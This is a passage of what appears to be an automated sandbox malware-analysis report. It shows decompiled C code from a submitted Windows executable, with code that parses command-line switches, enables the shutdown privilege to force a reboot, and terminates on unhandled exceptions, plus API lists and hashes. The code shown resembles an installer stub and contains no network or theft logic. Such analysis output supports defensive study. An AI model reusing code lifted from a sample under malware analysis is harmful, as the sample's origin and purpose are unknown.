                                                				_t209 = 1;
                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                					_t63 = 1;
                                                				} else {
                                                					L2:
                                                					while(_t209 != 0) {
                                                						_t67 =  *_t173;
                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                							_t173 = CharNextA(_t173);
                                                							continue;
                                                						}
                                                						_v272 = _t173;
                                                						if(_t67 == 0) {
                                                							break;
                                                						} else {
                                                							_t69 = _v272;
                                                							_t177 = 0;
                                                							_t213 = 0;
                                                							_t163 = 0;
                                                							_t202 = 1;
                                                							do {
                                                								if(_t213 != 0) {
                                                									if(_t163 != 0) {
                                                										break;
                                                									} else {
                                                										goto L21;
                                                									}
                                                								} else {
                                                									_t69 =  *_t69;
                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                										break;
                                                									} else {
                                                										_t69 = _v272;
                                                										L21:
                                                										_t155 =  *_t69;
                                                										if(_t155 != 0x22) {
                                                											if(_t202 >= 0x104) {
                                                												goto L106;
                                                											} else {
                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                												_t177 = _t177 + 1;
                                                												_t202 = _t202 + 1;
                                                												_t157 = 1;
                                                												goto L30;
                                                											}
                                                										} else {
                                                											if(_v272[1] == 0x22) {
                                                												if(_t202 >= 0x104) {
                                                													L106:
                                                													_t63 = 0;
                                                													L125:
                                                													_pop(_t210);
                                                													_pop(_t212);
                                                													_pop(_t162);
                                                													return E00AC6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                												} else {
                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                													_t177 = _t177 + 1;
                                                													_t202 = _t202 + 1;
                                                													_t157 = 2;
                                                													goto L30;
                                                												}
                                                											} else {
                                                												_t157 = 1;
                                                												if(_t213 != 0) {
                                                													_t163 = 1;
                                                												} else {
                                                													_t213 = 1;
                                                												}
                                                												goto L30;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L131;
                                                								L30:
                                                								_v272 =  &(_v272[_t157]);
                                                								_t69 = _v272;
                                                							} while ( *_t69 != 0);
                                                							if(_t177 >= 0x104) {
                                                								E00AC6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                								asm("int3");
                                                								_push(_t221);
                                                								_t222 = _t223;
                                                								_t71 =  *0xac8004; // 0xc32e3ded
                                                								_v296 = _t71 ^ _t223;
                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                									0x4f0 = 2;
                                                									_t75 = E00AC597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                								} else {
                                                									E00AC44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                									 *0xac9124 = E00AC6285();
                                                									_t75 = 0;
                                                								}
                                                								return E00AC6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                							} else {
                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                								if(_t213 == 0) {
                                                									if(_t163 != 0) {
                                                										goto L34;
                                                									} else {
                                                										goto L40;
                                                									}
                                                								} else {
                                                									if(_t163 != 0) {
                                                										L40:
                                                										_t79 = _v268;
                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                											if(_t83 == 0) {
                                                												_t202 = 0x521;
                                                												E00AC44B9(0, 0x521, 0xac1140, 0, 0x40, 0);
                                                												_t85 =  *0xac8588; // 0x0
                                                												if(_t85 != 0) {
                                                													CloseHandle(_t85);
                                                												}
                                                												ExitProcess(0);
                                                											}
                                                											_t87 = _t83 - 4;
                                                											if(_t87 == 0) {
                                                												if(_v266 != 0) {
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                														_t215 =  &_v268 + _t167;
                                                														_t183 =  &_v268 + _t167;
                                                														_t50 = _t183 + 1; // 0x1
                                                														_t202 = _t50;
                                                														do {
                                                															_t88 =  *_t183;
                                                															_t183 = _t183 + 1;
                                                														} while (_t88 != 0);
                                                														if(_t183 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t205 = 0x5b;
                                                															if(E00AC667F(_t215, _t205) == 0) {
                                                																L115:
                                                																_t206 = 0x5d;
                                                																if(E00AC667F(_t215, _t206) == 0) {
                                                																	L117:
                                                																	_t202 =  &_v276;
                                                																	_v276 = _t167;
                                                																	if(E00AC5C17(_t215,  &_v276) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		_t202 = 0x104;
                                                																		E00AC1680(0xac8c42, 0x104, _v276 + _t167 +  &_v268);
                                                																	}
                                                																} else {
                                                																	_t202 = 0x5b;
                                                																	if(E00AC667F(_t215, _t202) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		goto L117;
                                                																	}
                                                																}
                                                															} else {
                                                																_t202 = 0x5d;
                                                																if(E00AC667F(_t215, _t202) == 0) {
                                                																	goto L49;
                                                																} else {
                                                																	goto L115;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													 *0xac8a24 = 1;
                                                												}
                                                												goto L50;
                                                											} else {
                                                												_t100 = _t87 - 1;
                                                												if(_t100 == 0) {
                                                													L98:
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                														_t217 =  &_v268 + _t170;
                                                														_t192 =  &_v268 + _t170;
                                                														_t38 = _t192 + 1; // 0x1
                                                														_t202 = _t38;
                                                														do {
                                                															_t101 =  *_t192;
                                                															_t192 = _t192 + 1;
                                                														} while (_t101 != 0);
                                                														if(_t192 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t202 =  &_v276;
                                                															_v276 = _t170;
                                                															if(E00AC5C17(_t217,  &_v276) == 0) {
                                                																goto L49;
                                                															} else {
                                                																_t104 = CharUpperA(_v267);
                                                																_t218 = 0xac8b3e;
                                                																_t105 = _v276;
                                                																if(_t104 != 0x54) {
                                                																	_t218 = 0xac8a3a;
                                                																}
                                                																E00AC1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                																_t202 = 0x104;
                                                																E00AC658A(_t218, 0x104, 0xac1140);
                                                																if(E00AC31E0(_t218) != 0) {
                                                																	goto L50;
                                                																} else {
                                                																	goto L106;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													_t111 = _t100 - 0xa;
                                                													if(_t111 == 0) {
                                                														if(_v266 != 0) {
                                                															if(_v266 != 0x3a) {
                                                																goto L49;
                                                															} else {
                                                																_t199 = _v265;
                                                																if(_t199 != 0) {
                                                																	_t219 =  &_v265;
                                                																	do {
                                                																		_t219 = _t219 + 1;
                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                																		if(_t115 == 0) {
                                                																			 *0xac8a2c = 1;
                                                																		} else {
                                                																			_t200 = 2;
                                                																			_t119 = _t115 - _t200;
                                                																			if(_t119 == 0) {
                                                																				 *0xac8a30 = 1;
                                                																			} else {
                                                																				if(_t119 == 0xf) {
                                                																					 *0xac8a34 = 1;
                                                																				} else {
                                                																					_t209 = 0;
                                                																				}
                                                																			}
                                                																		}
                                                																		_t118 =  *_t219;
                                                																		_t199 = _t118;
                                                																	} while (_t118 != 0);
                                                																}
                                                															}
                                                														} else {
                                                															 *0xac8a2c = 1;
                                                														}
                                                														goto L50;
                                                													} else {
                                                														_t127 = _t111 - 3;
                                                														if(_t127 == 0) {
                                                															if(_v266 != 0) {
                                                																if(_v266 != 0x3a) {
                                                																	goto L49;
                                                																} else {
                                                																	_t129 = CharUpperA(_v265);
                                                																	if(_t129 == 0x31) {
                                                																		goto L76;
                                                																	} else {
                                                																		if(_t129 == 0x41) {
                                                																			goto L83;
                                                																		} else {
                                                																			if(_t129 == 0x55) {
                                                																				goto L76;
                                                																			} else {
                                                																				goto L49;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															} else {
                                                																L76:
                                                																_push(2);
                                                																_pop(1);
                                                																L83:
                                                																 *0xac8a38 = 1;
                                                															}
                                                															goto L50;
                                                														} else {
                                                															_t132 = _t127 - 1;
                                                															if(_t132 == 0) {
                                                																if(_v266 != 0) {
                                                																	if(_v266 != 0x3a) {
                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                																			goto L49;
                                                																		}
                                                																	} else {
                                                																		_t201 = _v265;
                                                																		 *0xac9a2c = 1;
                                                																		if(_t201 != 0) {
                                                																			_t220 =  &_v265;
                                                																			do {
                                                																				_t220 = _t220 + 1;
                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                																				if(_t142 == 0) {
                                                																					_t143 = 2;
                                                																					 *0xac9a2c =  *0xac9a2c | _t143;
                                                																					goto L70;
                                                																				} else {
                                                																					_t145 = _t142 - 3;
                                                																					if(_t145 == 0) {
                                                																						 *0xac8d48 =  *0xac8d48 | 0x00000040;
                                                																					} else {
                                                																						_t146 = _t145 - 5;
                                                																						if(_t146 == 0) {
                                                																							 *0xac9a2c =  *0xac9a2c & 0xfffffffd;
                                                																							goto L70;
                                                																						} else {
                                                																							_t147 = _t146 - 5;
                                                																							if(_t147 == 0) {
                                                																								 *0xac9a2c =  *0xac9a2c & 0xfffffffe;
                                                																								goto L70;
                                                																							} else {
                                                																								_t149 = _t147;
                                                																								if(_t149 == 0) {
                                                																									 *0xac8d48 =  *0xac8d48 | 0x00000080;
                                                																								} else {
                                                																									if(_t149 == 3) {
                                                																										 *0xac9a2c =  *0xac9a2c | 0x00000004;
                                                																										L70:
                                                																										 *0xac8a28 = 1;
                                                																									} else {
                                                																										_t209 = 0;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																				_t144 =  *_t220;
                                                																				_t201 = _t144;
                                                																			} while (_t144 != 0);
                                                																		}
                                                																	}
                                                																} else {
                                                																	 *0xac9a2c = 3;
                                                																	 *0xac8a28 = 1;
                                                																}
                                                																goto L50;
                                                															} else {
                                                																if(_t132 == 0) {
                                                																	goto L98;
                                                																} else {
                                                																	L49:
                                                																	_t209 = 0;
                                                																	L50:
                                                																	_t173 = _v272;
                                                																	if( *_t173 != 0) {
                                                																		goto L2;
                                                																	} else {
                                                																		break;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											goto L106;
                                                										}
                                                									} else {
                                                										L34:
                                                										_t209 = 0;
                                                										break;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L131;
                                                					}
                                                					if( *0xac8a2c != 0 &&  *0xac8b3e == 0) {
                                                						if(GetModuleFileNameA( *0xac9a3c, 0xac8b3e, 0x104) == 0) {
                                                							_t209 = 0;
                                                						} else {
                                                							_t202 = 0x5c;
                                                							 *((char*)(E00AC66C8(0xac8b3e, _t202) + 1)) = 0;
                                                						}
                                                					}
                                                					_t63 = _t209;
                                                				}
                                                				L131:
                                                			}


































































                                                0x00ac5c9e
                                                0x00ac5ca9
                                                0x00ac5cb0
                                                0x00ac5cb3
                                                0x00ac5cb6
                                                0x00ac5cb7
                                                0x00ac5cb8
                                                0x00ac5cbd
                                                0x00ac6204
                                                0x00ac5ccb
                                                0x00000000
                                                0x00ac5ccb
                                                0x00ac5cd3
                                                0x00ac5cd7
                                                0x00ac5cf4
                                                0x00000000
                                                0x00ac5cf4
                                                0x00ac5cf8
                                                0x00ac5d00
                                                0x00000000
                                                0x00ac5d06
                                                0x00ac5d06
                                                0x00ac5d0e
                                                0x00ac5d10
                                                0x00ac5d12
                                                0x00ac5d14
                                                0x00ac5d15
                                                0x00ac5d17
                                                0x00ac5d49
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5d19
                                                0x00ac5d19
                                                0x00ac5d1d
                                                0x00000000
                                                0x00ac5d3f
                                                0x00ac5d3f
                                                0x00ac5d4b
                                                0x00ac5d4b
                                                0x00ac5d4f
                                                0x00ac5d8d
                                                0x00000000
                                                0x00ac5d93
                                                0x00ac5d93
                                                0x00ac5d9a
                                                0x00ac5d9d
                                                0x00ac5d9e
                                                0x00000000
                                                0x00ac5d9e
                                                0x00ac5d51
                                                0x00ac5d5b
                                                0x00ac5d72
                                                0x00ac60fb
                                                0x00ac60fb
                                                0x00ac6207
                                                0x00ac620a
                                                0x00ac620b
                                                0x00ac620e
                                                0x00ac6217
                                                0x00ac5d78
                                                0x00ac5d78
                                                0x00ac5d80
                                                0x00ac5d83
                                                0x00ac5d84
                                                0x00000000
                                                0x00ac5d84
                                                0x00ac5d5d
                                                0x00ac5d5f
                                                0x00ac5d62
                                                0x00ac5d68
                                                0x00ac5d64
                                                0x00ac5d64
                                                0x00ac5d64
                                                0x00000000
                                                0x00ac5d62
                                                0x00ac5d5b
                                                0x00ac5d4f
                                                0x00ac5d1d
                                                0x00000000
                                                0x00ac5d9f
                                                0x00ac5d9f
                                                0x00ac5da5
                                                0x00ac5dab
                                                0x00ac5dba
                                                0x00ac6218
                                                0x00ac621d
                                                0x00ac6220
                                                0x00ac6221
                                                0x00ac6229
                                                0x00ac6230
                                                0x00ac6247
                                                0x00ac626a
                                                0x00ac6272
                                                0x00ac6249
                                                0x00ac6255
                                                0x00ac625f
                                                0x00ac6264
                                                0x00ac6264
                                                0x00ac6284
                                                0x00ac5dc0
                                                0x00ac5dc0
                                                0x00ac5dca
                                                0x00ac5e22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5dcc
                                                0x00ac5dce
                                                0x00ac5e24
                                                0x00ac5e24
                                                0x00ac5e2c
                                                0x00ac5e47
                                                0x00ac5e4a
                                                0x00ac61d2
                                                0x00ac61e2
                                                0x00ac61e7
                                                0x00ac61ee
                                                0x00ac61f1
                                                0x00ac61f1
                                                0x00ac61f8
                                                0x00ac61f8
                                                0x00ac5e50
                                                0x00ac5e53
                                                0x00ac6109
                                                0x00ac611f
                                                0x00000000
                                                0x00ac6125
                                                0x00ac6137
                                                0x00ac613a
                                                0x00ac613c
                                                0x00ac613e
                                                0x00ac613e
                                                0x00ac6141
                                                0x00ac6141
                                                0x00ac6143
                                                0x00ac6144
                                                0x00ac614a
                                                0x00000000
                                                0x00ac6150
                                                0x00ac6152
                                                0x00ac615c
                                                0x00ac6170
                                                0x00ac6172
                                                0x00ac617c
                                                0x00ac6190
                                                0x00ac6190
                                                0x00ac6196
                                                0x00ac61a5
                                                0x00000000
                                                0x00ac61ab
                                                0x00ac61b9
                                                0x00ac61c6
                                                0x00ac61c6
                                                0x00ac617e
                                                0x00ac6180
                                                0x00ac618a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac618a
                                                0x00ac615e
                                                0x00ac6160
                                                0x00ac616a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac616a
                                                0x00ac615c
                                                0x00ac614a
                                                0x00ac610b
                                                0x00ac610e
                                                0x00ac610e
                                                0x00000000
                                                0x00ac5e59
                                                0x00ac5e59
                                                0x00ac5e5c
                                                0x00ac604f
                                                0x00ac6056
                                                0x00000000
                                                0x00ac605c
                                                0x00ac606e
                                                0x00ac6071
                                                0x00ac6073
                                                0x00ac6075
                                                0x00ac6075
                                                0x00ac6078
                                                0x00ac6078
                                                0x00ac607a
                                                0x00ac607b
                                                0x00ac6081
                                                0x00000000
                                                0x00ac6087
                                                0x00ac6087
                                                0x00ac608d
                                                0x00ac609c
                                                0x00000000
                                                0x00ac60a2
                                                0x00ac60aa
                                                0x00ac60b2
                                                0x00ac60b7
                                                0x00ac60bd
                                                0x00ac60bf
                                                0x00ac60bf
                                                0x00ac60d6
                                                0x00ac60e0
                                                0x00ac60e7
                                                0x00ac60f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac60f5
                                                0x00ac609c
                                                0x00ac6081
                                                0x00ac5e62
                                                0x00ac5e62
                                                0x00ac5e65
                                                0x00ac5fd3
                                                0x00ac5fe9
                                                0x00000000
                                                0x00ac5fef
                                                0x00ac5fef
                                                0x00ac5ff7
                                                0x00ac5ffd
                                                0x00ac6003
                                                0x00ac6006
                                                0x00ac6011
                                                0x00ac6014
                                                0x00ac603d
                                                0x00ac6016
                                                0x00ac6018
                                                0x00ac6019
                                                0x00ac601b
                                                0x00ac6033
                                                0x00ac601d
                                                0x00ac6020
                                                0x00ac6029
                                                0x00ac6022
                                                0x00ac6022
                                                0x00ac6022
                                                0x00ac6020
                                                0x00ac601b
                                                0x00ac6042
                                                0x00ac6044
                                                0x00ac6046
                                                0x00ac604a
                                                0x00ac5ff7
                                                0x00ac5fd5
                                                0x00ac5fd8
                                                0x00ac5fd8
                                                0x00000000
                                                0x00ac5e6b
                                                0x00ac5e6b
                                                0x00ac5e6e
                                                0x00ac5f8b
                                                0x00ac5f99
                                                0x00000000
                                                0x00ac5f9f
                                                0x00ac5fa7
                                                0x00ac5faf
                                                0x00000000
                                                0x00ac5fb1
                                                0x00ac5fb3
                                                0x00000000
                                                0x00ac5fb5
                                                0x00ac5fb7
                                                0x00000000
                                                0x00ac5fb9
                                                0x00000000
                                                0x00ac5fb9
                                                0x00ac5fb7
                                                0x00ac5fb3
                                                0x00ac5faf
                                                0x00ac5f8d
                                                0x00ac5f8d
                                                0x00ac5f8d
                                                0x00ac5f8f
                                                0x00ac5fc1
                                                0x00ac5fc1
                                                0x00ac5fc1
                                                0x00000000
                                                0x00ac5e74
                                                0x00ac5e74
                                                0x00ac5e77
                                                0x00ac5ea0
                                                0x00ac5ebd
                                                0x00ac5f79
                                                0x00000000
                                                0x00ac5f7f
                                                0x00ac5ec3
                                                0x00ac5ec3
                                                0x00ac5ecc
                                                0x00ac5ed4
                                                0x00ac5ed6
                                                0x00ac5edc
                                                0x00ac5edf
                                                0x00ac5eea
                                                0x00ac5eed
                                                0x00ac5f3f
                                                0x00ac5f40
                                                0x00000000
                                                0x00ac5eef
                                                0x00ac5eef
                                                0x00ac5ef2
                                                0x00ac5f34
                                                0x00ac5ef4
                                                0x00ac5ef4
                                                0x00ac5ef7
                                                0x00ac5f2b
                                                0x00000000
                                                0x00ac5ef9
                                                0x00ac5ef9
                                                0x00ac5efc
                                                0x00ac5f22
                                                0x00000000
                                                0x00ac5efe
                                                0x00ac5eff
                                                0x00ac5f02
                                                0x00ac5f16
                                                0x00ac5f04
                                                0x00ac5f07
                                                0x00ac5f0d
                                                0x00ac5f46
                                                0x00ac5f46
                                                0x00ac5f09
                                                0x00ac5f09
                                                0x00ac5f09
                                                0x00ac5f07
                                                0x00ac5f02
                                                0x00ac5efc
                                                0x00ac5ef7
                                                0x00ac5ef2
                                                0x00ac5f4c
                                                0x00ac5f4e
                                                0x00ac5f50
                                                0x00ac5f54
                                                0x00ac5ed4
                                                0x00ac5ea2
                                                0x00ac5ea4
                                                0x00ac5eaf
                                                0x00ac5eaf
                                                0x00000000
                                                0x00ac5e79
                                                0x00ac5e7d
                                                0x00000000
                                                0x00ac5e83
                                                0x00ac5e83
                                                0x00ac5e83
                                                0x00ac5e85
                                                0x00ac5e85
                                                0x00ac5e8e
                                                0x00000000
                                                0x00ac5e94
                                                0x00000000
                                                0x00ac5e94
                                                0x00ac5e8e
                                                0x00ac5e7d
                                                0x00ac5e77
                                                0x00ac5e6e
                                                0x00ac5e65
                                                0x00ac5e5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5dd0
                                                0x00ac5dd0
                                                0x00ac5dd0
                                                0x00000000
                                                0x00ac5dd0
                                                0x00ac5dce
                                                0x00ac5dca
                                                0x00ac5dba
                                                0x00000000
                                                0x00ac5d00
                                                0x00ac5dd9
                                                0x00ac5e04
                                                0x00ac61fe
                                                0x00ac5e0a
                                                0x00ac5e0c
                                                0x00ac5e17
                                                0x00ac5e17
                                                0x00ac5e04
                                                0x00ac6200
                                                0x00ac6200
                                                0x00000000

                                                APIs
                                                • CharNextA.USER32(?,00000000,?,?), ref: 00AC5CEE
                                                • GetModuleFileNameA.KERNEL32(00AC8B3E,00000104,00000000,?,?), ref: 00AC5DFC
                                                • CharUpperA.USER32(?), ref: 00AC5E3E
                                                • CharUpperA.USER32(-00000052), ref: 00AC5EE1
                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00AC5F6F
                                                • CharUpperA.USER32(?), ref: 00AC5FA7
                                                • CharUpperA.USER32(-0000004E), ref: 00AC6008
                                                • CharUpperA.USER32(?), ref: 00AC60AA
                                                • CloseHandle.KERNEL32(00000000,00AC1140,00000000,00000040,00000000), ref: 00AC61F1
                                                • ExitProcess.KERNEL32 ref: 00AC61F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                • String ID: "$"$:$RegServer
                                                • API String ID: 1203814774-25366791
                                                • Opcode ID: 640cafd0d02e5a5afc033507ad12f55354631aea6136b4cb16742357161ae068
                                                • Instruction ID: c1d48bfd03ecbad6118a97f9511b19a68d700d36c6e6e39915100b6045ae284d
                                                • Opcode Fuzzy Hash: 640cafd0d02e5a5afc033507ad12f55354631aea6136b4cb16742357161ae068
                                                • Instruction Fuzzy Hash: BAD15A71E08A445EDF39CB3C8C48FFA37A1AB16344F1B41ADE486D6191DA74AEC2CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00AC1F90(signed int __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				int _v12;
                                                				struct _TOKEN_PRIVILEGES _v24;
                                                				void* _v28;
                                                				void* __ebx;
                                                				signed int _t13;
                                                				int _t21;
                                                				void* _t25;
                                                				int _t28;
                                                				signed char _t30;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t41;
                                                				signed int _t46;
                                                
                                                				_t41 = __esi;
                                                				_t38 = __edi;
                                                				_t30 = __ecx;
                                                				if((__ecx & 0x00000002) != 0) {
                                                					L12:
                                                					if((_t30 & 0x00000004) != 0) {
                                                						L14:
                                                						if( *0xac9a40 != 0) {
                                                							_pop(_t30);
                                                							_t44 = _t46;
                                                							_t13 =  *0xac8004; // 0xc32e3ded
                                                							_v8 = _t13 ^ _t46;
                                                							_push(_t38);
                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                								_v24.PrivilegeCount = 1;
                                                								_v12 = 2;
                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                								CloseHandle(_v28);
                                                								_t41 = _t41;
                                                								_push(0);
                                                								if(_t21 != 0) {
                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                										_t25 = 1;
                                                									} else {
                                                										_t37 = 0x4f7;
                                                										goto L3;
                                                									}
                                                								} else {
                                                									_t37 = 0x4f6;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								_t37 = 0x4f5;
                                                								L3:
                                                								_push(0);
                                                								L4:
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								E00AC44B9(0, _t37);
                                                								_t25 = 0;
                                                							}
                                                							_pop(_t40);
                                                							return E00AC6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                						} else {
                                                							_t28 = ExitWindowsEx(2, 0);
                                                							goto L16;
                                                						}
                                                					} else {
                                                						_t37 = 0x522;
                                                						_t28 = E00AC44B9(0, 0x522, 0xac1140, 0, 0x40, 4);
                                                						if(_t28 != 6) {
                                                							goto L16;
                                                						} else {
                                                							goto L14;
                                                						}
                                                					}
                                                				} else {
                                                					__eax = E00AC1EA7(__ecx);
                                                					if(__eax != 2) {
                                                						L16:
                                                						return _t28;
                                                					} else {
                                                						goto L12;
                                                					}
                                                				}
                                                			}

















                                                0x00ac1f90
                                                0x00ac1f90
                                                0x00ac1f93
                                                0x00ac1f98
                                                0x00ac1fa4
                                                0x00ac1fa7
                                                0x00ac1fc5
                                                0x00ac1fcd
                                                0x00ac1fdb
                                                0x00ac1ee5
                                                0x00ac1eea
                                                0x00ac1ef1
                                                0x00ac1ef4
                                                0x00ac1f0c
                                                0x00ac1f2e
                                                0x00ac1f3a
                                                0x00ac1f46
                                                0x00ac1f4d
                                                0x00ac1f58
                                                0x00ac1f60
                                                0x00ac1f61
                                                0x00ac1f62
                                                0x00ac1f75
                                                0x00ac1f80
                                                0x00ac1f77
                                                0x00ac1f77
                                                0x00000000
                                                0x00ac1f77
                                                0x00ac1f64
                                                0x00ac1f64
                                                0x00000000
                                                0x00ac1f64
                                                0x00ac1f0e
                                                0x00ac1f0e
                                                0x00ac1f13
                                                0x00ac1f13
                                                0x00ac1f14
                                                0x00ac1f14
                                                0x00ac1f16
                                                0x00ac1f17
                                                0x00ac1f1a
                                                0x00ac1f1f
                                                0x00ac1f1f
                                                0x00ac1f86
                                                0x00ac1f8f
                                                0x00ac1fcf
                                                0x00ac1fd3
                                                0x00000000
                                                0x00ac1fd3
                                                0x00ac1fa9
                                                0x00ac1fb4
                                                0x00ac1fbb
                                                0x00ac1fc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac1fc3
                                                0x00ac1f9a
                                                0x00ac1f9a
                                                0x00ac1fa2
                                                0x00ac1fd9
                                                0x00ac1fda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac1fa2

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00AC1EFB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00AC1F02
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00AC1FD3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2795981589-3733053543
                                                • Opcode ID: df79233d657cc42c6ef213b6a82e48397e22de4593b683b1e40677abdad66c8a
                                                • Instruction ID: 2226d01446aa0643d61bdfe481ae9a99a25f129ae406cd3c288c332291418c7a
                                                • Opcode Fuzzy Hash: df79233d657cc42c6ef213b6a82e48397e22de4593b683b1e40677abdad66c8a
                                                • Instruction Fuzzy Hash: 9F21FC71B402057BDB20DBE19C4EF7F76B8EB86754F22051DFA02E6182D7758802D2A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				UnhandledExceptionFilter(_a4);
                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                			}



                                                0x00ac6cf7
                                                0x00ac6d00
                                                0x00ac6d19

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC6E26,00AC1000), ref: 00AC6CF7
                                                • UnhandledExceptionFilter.KERNEL32(00AC6E26,?,00AC6E26,00AC1000), ref: 00AC6D00
                                                • GetCurrentProcess.KERNEL32(C0000409,?,00AC6E26,00AC1000), ref: 00AC6D0B
                                                • TerminateProcess.KERNEL32(00000000,?,00AC6E26,00AC1000), ref: 00AC6D12
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                • String ID:
                                                • API String ID: 3231755760-0
                                                • Opcode ID: 2cb79b378bdbf6d0707551eca3411c13c6c45089a7a7a68daa893c6bc2e459f8
                                                • Instruction ID: 0fcdbba18dad712142f30d72ee56acdf0a3506138f548d6a5fc0dace72f80a71
